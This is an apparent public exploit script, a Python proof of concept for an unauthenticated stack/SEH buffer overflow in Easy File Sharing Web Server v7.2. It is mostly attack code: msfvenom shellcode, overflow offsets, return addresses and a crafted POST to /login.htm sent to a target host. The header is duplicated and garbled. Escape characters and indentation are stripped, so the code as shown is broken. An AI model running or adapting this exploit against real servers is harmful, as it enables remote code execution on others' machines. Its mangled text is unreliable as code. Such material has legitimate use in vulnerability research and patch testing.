# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: #!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: February 7th, 2020
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated,
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed
# POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create
# an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the
# socket directly.
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Change the 'host' variable below to the IP to the target devices IP
# 4) Run this python script
# 5) The program will crash and calculator will open
import socket
host = "192.168.70.134"
port = 80
nops = 'x90'*200
# Bad char = x00,x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b 'x00x3b' -f python -v shellcode
# Payload size: 216 bytes
shellcode = b""
shellcode += b"xdaxcfxbex33x02x8ex27xd9x74x24xf4"
shellcode += b"x5ax33xc9xb1x30x31x72x18x83xc2x04"
shellcode += b"x03x72x27xe0x7bxdbxafx66x83x24x2f"
shellcode += b"x07x0dxc1x1ex07x69x81x30xb7xf9xc7"
shellcode += b"xbcx3cxafxf3x37x30x78xf3xf0xffx5e"
shellcode += b"x3ax01x53xa2x5dx81xaexf7xbdxb8x60"
shellcode += b"x0axbfxfdx9dxe7xedx56xe9x5ax02xd3"
shellcode += b"xa7x66xa9xafx26xefx4ex67x48xdexc0"
shellcode += b"xfcx13xc0xe3xd1x2fx49xfcx36x15x03"
shellcode += b"x77x8cxe1x92x51xddx0ax38x9cxd2xf8"
shellcode += b"x40xd8xd4xe2x36x10x27x9ex40xe7x5a"
shellcode += b"x44xc4xfcxfcx0fx7exd9xfdxdcx19xaa"
shellcode += b"xf1xa9x6exf4x15x2fxa2x8ex21xa4x45"
shellcode += b"x41xa0xfex61x45xe9xa5x08xdcx57x0b"
shellcode += b"x34x3ex38xf4x90x34xd4xe1xa8x16xb2"
shellcode += b"xf4x3fx2dxf0xf7x3fx2exa4x9fx0exa5"
shellcode += b"x2bxe7x8ex6cx08x17xc5x2dx38xb0x80"
shellcode += b"xa7x79xddx32x12xbdxd8xb0x97x3dx1f"
shellcode += b"xa8xddx38x5bx6ex0dx30xf4x1bx31xe7"
shellcode += b"xf5x09x52x66x66xd1x95"
# + ECX & SEH offset @ 3996
offsetECX = 'xcc'*(3996-len(nops+shellcode))
CL = 'x42'
CH = 'x3f'
offsetEIP = 'x43'*8
high2bECX = 'x42x42'
# EIP overwrite at offset 4008
# - EBX holds PTR to payload in Heap
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)
ret1 = 'x19x1ex01x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret
# - After EIP overwrite ret, ESP is at +16 bytes
offsetRet2 = 'x42'*12
ret2 = 'x5bx02xc4x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2
httpRequest = "POST /login.htm HTTP/1.1 "
httpRequest += "Host: "+host+" "
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 "
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
httpRequest += "Accept-Language: en-US,en;q=0.5 "
httpRequest += "Accept-Encoding: gzip, deflate "
httpRequest += "Referer: http://"+host+"/register.ghp "
httpRequest += "Content-Type: application/x-www-form-urlencoded "
httpRequest += "Connection: close "
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201 "
httpRequest += "Upgrade-Insecure-Requests: 1 "
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=®ister=Register%21 "
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((host, port))
print("[+] Successfully connected to "+host)
s.send(httpRequest)
print("[+] Payload Sent")
except:
print("Failure to launch")